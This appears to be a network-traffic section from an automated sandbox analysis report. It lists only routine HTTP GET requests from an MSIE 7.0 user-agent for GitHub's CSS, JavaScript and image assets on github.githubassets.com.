Source: global traffic	HTTP traffic detected: GET /assets/home-339181319b7e.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/primer-react-css.8879c83c1311e6328466.module.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/wp-runtime-f35b332dbe90.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_dompurify_dist_purify_js-b73fdff77a4e.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js-56729c905fe2.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_arianotify-polyfill_ariaNotify-polyfill_js-node_modules_github_mi-247092-b9c7cf3107b7.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/environment-2f240f7ed1b3.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/ui_packages_failbot_failbot_ts-aabfa4ec15fe.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_primer_behaviors_dist_esm_index_mjs-4aa4b0e95669.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-f690fd9ae3d5.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_auto-complete-element_dist_index_js-a164c5ea9f62.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_relative-time-element_dist_index_js-6d3967acd51c.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_text-expander-element_dist_index_js-e40ed7658a74.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-d1a841-8f251a0656e7.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-f4b251-f7c3b6081b19.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_stacktrace-parser_dist_s-6b2a62-6fef0f2ad42a.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-eb9d54-74622d897749.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/github-elements-36d7dcef5a08.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/element-registry-f52a50a0449b.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_catalyst_lib_index_js-node_modules_primer_live-region-element_dis-428401-bb66ac5d7472.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_braintree_browser-detection_dist_browser-detection_js-node_modules_githu-bb80ec-634de60bacfa.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_lit-html_lit-html_js-ce7225a304c5.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_hydro-analytics-client_dist_analytics-client_js-node_modules_gith-f3aee1-e6893db9c19e.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_morphdom_dist_morphdom-e-7c534c-f8a5485c982a.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-893f9f-6cf3320416b8.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-858e043fcf76.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_scroll-anchoring_dist_scroll-anchoring_esm_js-node_modules_stacktrace-pa-a71630-67856ad29bae.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_color-convert_index_js-0e07cc183eed.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_quote-selection_dist_index_js-node_modules_github_session-resume_-9a8cd2-373766bf71f1.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/ui_packages_updatable-content_updatable-content_ts-3f4401350bd7.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_modules_github_sso_ts-ui_packages-900dde-ab87c1d6c5c8.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/app_assets_modules_github_sticky-scroll-into-view_ts-112600808cf9.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_modules_github_behaviors_include-d0d0a6-6faacedf87fe.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-aeae6fcdf371.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/behaviors-b32b736e8b72.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-bf7e5a3732fd.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/notifications-global-54f34167118d.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_delegated-events_dist_in-bae876-1e5b19a38261.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/marketing-872ff8663359.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/marketing-experiments-6794cdd7dce1.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/home-fa7c9cc8a53c.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/webgl-globe-b8ac95da6496.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_webgl-globe_dist_js_main_js-7ace716f3606.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/react-lib-7b7b5264f6c1.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_primer_react_lib-esm_Fea-39267a-9ffd541aafbc.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_primer_react_lib-esm_Button_Button_js-f36ad879d477.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_primer_react_lib-esm_TooltipV2_Tooltip_js-e39b44f27fbb.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_js-540a2acf621f.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_primer_react_lib-esm_KeybindingHint_KeybindingHint_js-node_modules_githu-3fe5e5-779b0a7957e4.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_primer_react_lib-esm_Dialog_Dialog_js-node_modules_primer_react_lib-esm_-34d71e-a36ca1cac968.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/ui_packages_react-core_create-browser-history_ts-ui_packages_react-core_AppContextProvider_ts-ffb979-ed6ff1fbeca4.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/keyboard-shortcuts-dialog-3d3b90edc171.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/sessions-f3ddee0032e4.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-9a621ecbf672.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/thumbnail-31b2a20df6fc.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/play-1844e8414ade.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/hero-desktop-a38b0fd77b6c.webp HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/hero-mobile-7163f4f5de41.webp HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/3m-0151c2fda0ce.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/kpmg-c249f20c5173.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
